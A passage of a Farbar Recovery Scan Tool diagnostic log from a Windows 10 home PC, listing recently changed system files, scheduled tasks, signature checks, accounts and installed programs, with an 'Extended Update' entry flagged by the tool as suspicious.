2016-01-31 09:26 - 2016-01-16 00:44 - 22394368 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-01-31 09:26 - 2016-01-16 00:35 - 13018624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2016-01-31 09:26 - 2016-01-16 00:32 - 24602624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-01-31 09:26 - 2016-01-16 00:26 - 19338752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-01-31 09:26 - 2016-01-16 00:24 - 18678272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-01-31 09:25 - 2016-01-16 01:37 - 00202472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscapi.dll
2016-01-31 09:25 - 2016-01-16 01:36 - 01173344 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-01-31 09:25 - 2016-01-16 01:36 - 00713568 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-01-31 09:25 - 2016-01-16 01:34 - 00513888 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-01-31 09:25 - 2016-01-16 01:24 - 00538632 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll
2016-01-31 09:25 - 2016-01-16 01:23 - 00848160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-01-31 09:25 - 2016-01-16 01:23 - 00785088 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll
2016-01-31 09:25 - 2016-01-16 01:23 - 00536256 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-01-31 09:25 - 2016-01-16 01:23 - 00408120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2016-01-31 09:25 - 2016-01-16 01:23 - 00369912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2016-01-31 09:25 - 2016-01-16 01:21 - 22572624 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-01-31 09:25 - 2016-01-16 01:21 - 01750440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcMon.exe
2016-01-31 09:25 - 2016-01-16 01:20 - 06600904 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-01-31 09:25 - 2016-01-16 01:20 - 00652312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2016-01-31 09:25 - 2016-01-16 01:20 - 00431240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWanAPI.dll
2016-01-31 09:25 - 2016-01-16 01:20 - 00366224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AUDIOKSE.dll
2016-01-31 09:25 - 2016-01-16 01:19 - 00709688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-01-31 09:25 - 2016-01-16 01:19 - 00405568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2016-01-31 09:25 - 2016-01-16 01:17 - 21125400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-01-31 09:25 - 2016-01-16 01:16 - 05238360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-01-31 09:25 - 2016-01-16 01:13 - 01998168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-01-31 09:25 - 2016-01-16 01:13 - 00576864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-01-31 09:25 - 2016-01-16 01:12 - 01415200 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-01-31 09:25 - 2016-01-16 01:09 - 01089880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-01-31 09:25 - 2016-01-16 01:08 - 01174008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-01-31 09:25 - 2016-01-16 01:08 - 00440152 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2016-01-31 09:25 - 2016-01-16 00:46 - 00067072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbser.sys
2016-01-31 09:25 - 2016-01-16 00:44 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-01-31 09:25 - 2016-01-16 00:44 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasadhlp.dll
2016-01-31 09:25 - 2016-01-16 00:44 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastlsext.dll
2016-01-31 09:25 - 2016-01-16 00:43 - 00097280 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttpcom.dll
2016-01-31 09:25 - 2016-01-16 00:42 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll
2016-01-31 09:25 - 2016-01-16 00:42 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sscoreext.dll
2016-01-31 09:25 - 2016-01-16 00:41 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2016-01-31 09:25 - 2016-01-16 00:40 - 11545088 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-01-31 09:25 - 2016-01-16 00:40 - 00106496 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasauto.dll
2016-01-31 09:25 - 2016-01-16 00:40 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcaui.exe
2016-01-31 09:25 - 2016-01-16 00:40 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasautou.exe
2016-01-31 09:25 - 2016-01-16 00:39 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\FilterDS.dll
2016-01-31 09:25 - 2016-01-16 00:38 - 07979008 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-01-31 09:25 - 2016-01-16 00:38 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-01-31 09:25 - 2016-01-16 00:38 - 00193024 _____ (Microsoft Corporation) C:\WINDOWS\system32\SimCfg.dll
2016-01-31 09:25 - 2016-01-16 00:38 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\winbio.dll
2016-01-31 09:25 - 2016-01-16 00:37 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-01-31 09:25 - 2016-01-16 00:37 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-01-31 09:25 - 2016-01-16 00:37 - 00190464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll
2016-01-31 09:25 - 2016-01-16 00:37 - 00073728 _____ (Microsoft Corporation) C:\WINDOWS\system32\SMSRouter.dll
2016-01-31 09:25 - 2016-01-16 00:36 - 00638464 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-01-31 09:25 - 2016-01-16 00:36 - 00475648 _____ (Microsoft Corporation) C:\WINDOWS\system32\DDDS.dll
2016-01-31 09:25 - 2016-01-16 00:36 - 00221696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2016-01-31 09:25 - 2016-01-16 00:36 - 00160768 _____ (Microsoft Corporation) C:\WINDOWS\system32\SimAuth.dll
2016-01-31 09:25 - 2016-01-16 00:36 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastlsext.dll
2016-01-31 09:25 - 2016-01-16 00:35 - 00383488 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2016-01-31 09:25 - 2016-01-16 00:35 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasadhlp.dll
2016-01-31 09:25 - 2016-01-16 00:34 - 00610816 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2016-01-31 09:25 - 2016-01-16 00:34 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2016-01-31 09:25 - 2016-01-16 00:34 - 00477696 _____ (Microsoft Corporation) C:\WINDOWS\system32\srcore.dll
2016-01-31 09:25 - 2016-01-16 00:34 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-01-31 09:25 - 2016-01-16 00:34 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttpcom.dll
2016-01-31 09:25 - 2016-01-16 00:33 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidcli.dll
2016-01-31 09:25 - 2016-01-16 00:33 - 00574976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.UX.EapRequestHandler.dll
2016-01-31 09:25 - 2016-01-16 00:33 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll
2016-01-31 09:25 - 2016-01-16 00:32 - 00621568 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2016-01-31 09:25 - 2016-01-16 00:32 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pcaui.exe
2016-01-31 09:25 - 2016-01-16 00:31 - 00851456 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-01-31 09:25 - 2016-01-16 00:31 - 00794112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll
2016-01-31 09:25 - 2016-01-16 00:31 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2016-01-31 09:25 - 2016-01-16 00:31 - 00343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2016-01-31 09:25 - 2016-01-16 00:31 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasautou.exe
2016-01-31 09:25 - 2016-01-16 00:30 - 13382656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-01-31 09:25 - 2016-01-16 00:30 - 02127360 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2016-01-31 09:25 - 2016-01-16 00:30 - 01053696 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-01-31 09:25 - 2016-01-16 00:30 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-01-31 09:25 - 2016-01-16 00:30 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SimCfg.dll
2016-01-31 09:25 - 2016-01-16 00:30 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winbio.dll
2016-01-31 09:25 - 2016-01-16 00:29 - 01500672 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2016-01-31 09:25 - 2016-01-16 00:29 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-01-31 09:25 - 2016-01-16 00:28 - 09918976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-01-31 09:25 - 2016-01-16 00:28 - 02624512 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-01-31 09:25 - 2016-01-16 00:28 - 01318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-01-31 09:25 - 2016-01-16 00:28 - 00884736 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasdlg.dll
2016-01-31 09:25 - 2016-01-16 00:28 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SimAuth.dll
2016-01-31 09:25 - 2016-01-16 00:27 - 00335872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2016-01-31 09:25 - 2016-01-16 00:26 - 00535040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll
2016-01-31 09:25 - 2016-01-16 00:26 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-01-31 09:25 - 2016-01-16 00:26 - 00260608 _____ C:\WINDOWS\system32\MTFServer.dll
2016-01-31 09:25 - 2016-01-16 00:26 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-01-31 09:25 - 2016-01-16 00:25 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidcli.dll
2016-01-31 09:25 - 2016-01-16 00:25 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2016-01-31 09:25 - 2016-01-16 00:25 - 00235008 _____ C:\WINDOWS\system32\MTF.dll
2016-01-31 09:25 - 2016-01-16 00:24 - 02057216 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidsvc.dll
2016-01-31 09:25 - 2016-01-16 00:24 - 00613888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2016-01-31 09:25 - 2016-01-16 00:24 - 00350720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2016-01-31 09:25 - 2016-01-16 00:24 - 00273408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll
2016-01-31 09:25 - 2016-01-16 00:23 - 02050048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2016-01-31 09:25 - 2016-01-16 00:23 - 00687616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2016-01-31 09:25 - 2016-01-16 00:21 - 06297088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2016-01-31 09:25 - 2016-01-16 00:20 - 07199232 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-01-31 09:25 - 2016-01-16 00:20 - 02597888 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2016-01-31 09:25 - 2016-01-16 00:20 - 01944576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-01-31 09:25 - 2016-01-16 00:20 - 00799744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasdlg.dll
2016-01-31 09:25 - 2016-01-16 00:19 - 12126208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-01-31 09:25 - 2016-01-16 00:19 - 00733184 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2016-01-31 09:25 - 2016-01-16 00:19 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-01-31 09:25 - 2016-01-16 00:19 - 00162816 _____ C:\WINDOWS\SysWOW64\MTF.dll
2016-01-31 09:25 - 2016-01-16 00:19 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-01-31 09:25 - 2016-01-16 00:18 - 03593216 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-01-31 09:25 - 2016-01-16 00:18 - 01674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2016-01-31 09:25 - 2016-01-16 00:17 - 05503488 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2016-01-31 09:25 - 2016-01-16 00:16 - 05202944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2016-01-31 09:25 - 2016-01-16 00:16 - 01542656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2016-01-31 09:25 - 2016-01-16 00:15 - 04759040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2016-01-31 09:25 - 2016-01-16 00:14 - 01946624 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-01-31 09:25 - 2016-01-16 00:14 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-01-31 09:25 - 2016-01-16 00:11 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
2016-01-31 09:25 - 2016-01-16 00:09 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-19 15:16 - 2016-01-15 10:14 - 00000336 _____ C:\WINDOWS\Tasks\UpdaterEX.job
2016-02-19 15:14 - 2016-01-15 10:14 - 00000000 ____D C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42
2016-02-19 15:01 - 2015-10-31 13:39 - 00000938 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-02-19 14:14 - 2015-10-31 13:39 - 00000934 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-02-19 13:40 - 2015-10-31 13:05 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-02-19 13:37 - 2015-10-31 13:05 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-02-19 13:37 - 2015-10-30 02:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-02-19 13:25 - 2015-10-30 02:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-02-19 13:25 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-02-19 13:18 - 2015-10-31 13:39 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-02-19 13:15 - 2016-01-04 16:43 - 00003280 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForJonathan
2016-02-19 13:15 - 2016-01-04 16:43 - 00000376 _____ C:\WINDOWS\Tasks\HPCeeScheduleForJonathan.job
2016-02-19 13:10 - 2015-10-31 13:04 - 00000000 ____D C:\Program Files (x86)\Opera
2016-02-19 13:05 - 2015-10-31 18:39 - 00000000 ____D C:\Users\Jonathan\Documents\YouCam
2016-02-19 13:04 - 2015-12-06 19:53 - 00000000 __SHD C:\Users\Jonathan\IntelGraphicsProfiles
2016-02-19 13:04 - 2015-12-06 19:30 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-02-19 13:03 - 2015-12-06 19:47 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-02-19 13:02 - 2015-10-30 01:28 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2016-02-19 12:30 - 2015-12-06 19:34 - 00000000 ____D C:\Users\Jonathan
2016-02-19 12:27 - 2015-10-31 18:39 - 00000000 ____D C:\Users\Jonathan\AppData\Local\DropboxOEM
2016-02-19 12:27 - 2015-10-31 18:38 - 00000000 ____D C:\Users\Jonathan\AppData\Local\Hewlett-Packard
2016-02-19 12:27 - 2015-10-30 04:07 - 00000000 ____D C:\WINDOWS\ShellNew
2016-02-19 12:27 - 2015-10-30 04:07 - 00000000 ____D C:\Program Files\Windows Journal
2016-02-19 12:27 - 2015-10-30 02:24 - 00000000 ___SD C:\WINDOWS\system32\Nui
2016-02-19 12:27 - 2015-10-30 02:24 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-02-19 12:27 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\SysWOW64\setup
2016-02-19 12:27 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-02-19 12:27 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\setup
2016-02-19 12:27 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-02-19 12:27 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\icsxml
2016-02-19 12:27 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\rescache
2016-02-19 12:27 - 2015-10-30 02:21 - 00000000 ____D C:\WINDOWS\INF
2016-02-19 12:27 - 2015-10-30 01:28 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-02-19 12:27 - 2015-07-16 01:05 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-02-19 12:16 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\registration
2016-02-19 12:11 - 2015-10-31 18:38 - 00000000 ____D C:\Users\Jonathan\AppData\Local\Packages
2016-02-19 08:20 - 2016-01-15 10:14 - 00000000 ____D C:\ProgramData\b3eda95e-7691-0
2016-02-19 08:20 - 2016-01-15 10:14 - 00000000 ____D C:\ProgramData\b3eda95e-5667-1
2016-02-10 19:02 - 2015-10-31 18:41 - 00000000 ___RD C:\Users\Jonathan\OneDrive
2016-02-07 22:56 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-02-04 17:42 - 2015-11-01 19:46 - 00000892 _____ C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job
2016-02-04 17:40 - 2015-11-01 19:46 - 00004030 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2016-02-04 17:40 - 2015-10-31 13:35 - 00000000 ____D C:\Users\Jonathan\AppData\Local\Adobe
2016-02-04 10:42 - 2015-10-31 13:05 - 00003970 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1446314695
2016-02-04 10:42 - 2015-10-31 13:05 - 00001127 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2016-02-03 14:01 - 2015-10-30 02:26 - 00828920 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-02-03 14:01 - 2015-10-30 02:26 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-02-02 17:41 - 2015-12-06 19:34 - 00973984 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-02-02 17:40 - 2015-10-30 02:24 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-02-02 17:40 - 2015-10-30 02:24 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-02-02 17:38 - 2016-01-12 22:16 - 00000000 ____D C:\Program Files\Microsoft Office
2016-02-02 17:30 - 2015-10-30 02:24 - 00000000 ___SD C:\WINDOWS\system32\F12
2016-02-02 17:30 - 2015-10-30 02:24 - 00000000 ___RD C:\WINDOWS\PurchaseDialog
2016-02-02 17:30 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-02-02 17:30 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-02-01 16:56 - 2015-10-31 13:39 - 00003996 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-02-01 16:56 - 2015-10-31 13:39 - 00003764 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-01-29 12:57 - 2015-10-31 13:39 - 00002279 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-01-29 12:57 - 2015-10-31 13:39 - 00002267 _____ C:\Users\Public\Desktop\Google Chrome.lnk
 
Some files in TEMP:
====================
C:\Users\Jonathan\AppData\Local\Temp\drm_dialogs.dll
C:\Users\Jonathan\AppData\Local\Temp\InstallHelper.exe
C:\Users\Jonathan\AppData\Local\Temp\_is1E5B.exe
C:\Users\Jonathan\AppData\Local\Temp\_is47C1.exe
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-02-19 13:36
 
==================== End of FRST.txt ============================
 
Addition.txt:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:17-02-2016
Ran by Jonathan (2016-02-19 15:34:05)
Running from C:\Users\Jonathan\Downloads
Windows 10 Home (X64) (2015-12-07 00:52:47)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-2478984944-2039465796-333368353-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2478984944-2039465796-333368353-503 - Limited - Disabled)
Guest (S-1-5-21-2478984944-2039465796-333368353-501 - Limited - Disabled)
Jonathan (S-1-5-21-2478984944-2039465796-333368353-1001 - Administrator - Enabled) => C:\Users\Jonathan
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
12 Labours of Hercules III: Girl Power (x32 Version: 3.0.2.118 - WildTangent) Hidden
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.010.20059 - Adobe Systems Incorporated)
Adobe Flash Player 20 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.7.157 - Adobe Systems, Inc.)
Apple Application Support (32-bit) (HKLM-x32\...\{649A1FD9-5892-46AD-8DF0-C4A43FF61CB7}) (Version: 4.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{0DE0A178-AC7B-4650-806C-CF226DE03766}) (Version: 4.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Avast SecureLine (HKLM\...\{2CD3C92F-EDC5-4B02-9B0A-9C1D37C58EF5}_is1) (Version: 1.0.239.2 - AVAST Software)
Azkend 2: The World Beneath (x32 Version: 2.2.0.98 - WildTangent) Hidden
Barn Yarn Collector's Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.)
Coyote The Outlander (x32 Version: 3.0.2.59 - WildTangent) Hidden
CyberLink PhotoDirector (HKLM-x32\...\InstallShield_{5A454EC5-217A-42a5-8CE1-2DDEC4E70E01}) (Version: 5.0.5.6713 - CyberLink Corp.)
CyberLink PhotoDirector (Version: 5.0.5.6713 - CyberLink Corp.) Hidden
CyberLink Power Media Player 14 (HKLM-x32\...\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}) (Version: 14.0.1.5418 - CyberLink Corp.)
CyberLink PowerDirector 12 (HKLM-x32\...\InstallShield_{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.4.4301 - CyberLink Corp.)
CyberLink PowerDirector 12 (Version: 12.0.4.4301 - CyberLink Corp.) Hidden
CyberLink YouCam (HKLM-x32\...\{A9CEDD6E-4792-493e-BB35-D86D2E188A5A}) (Version: 6.0.1.4301 - CyberLink Corp.)
Delicious: Emily's Wonder Wedding Premium Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Dropbox 25 GB (HKLM-x32\...\{597A58EC-42D6-4940-8739-FB94491B013C}) (Version: 1.0.8.2 - Dropbox, Inc.)
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
Entwined: The Perfect Murder (x32 Version: 3.0.2.59 - WildTangent) Hidden
Evernote v. 5.8.6 (HKLM-x32\...\{FEDC7C10-EF67-11E4-9B07-00505695D7B0}) (Version: 5.8.6.7519 - Evernote Corp.)
Extended Update (HKU\S-1-5-21-2478984944-2039465796-333368353-1001\...\UpdaterEX) (Version:  - Extended Update) <==== ATTENTION
Family Vacation 2: Road Trip (x32 Version: 3.0.2.59 - WildTangent) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.97 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Home Makeover (x32 Version: 3.0.2.59 - WildTangent) Hidden
Hoyle Card Games 2005 (HKLM-x32\...\{B44AA698-B221-4B3B-8CA5-E65EF6A5AF26}) (Version: 1.2.0.0 - Encore, Inc.)
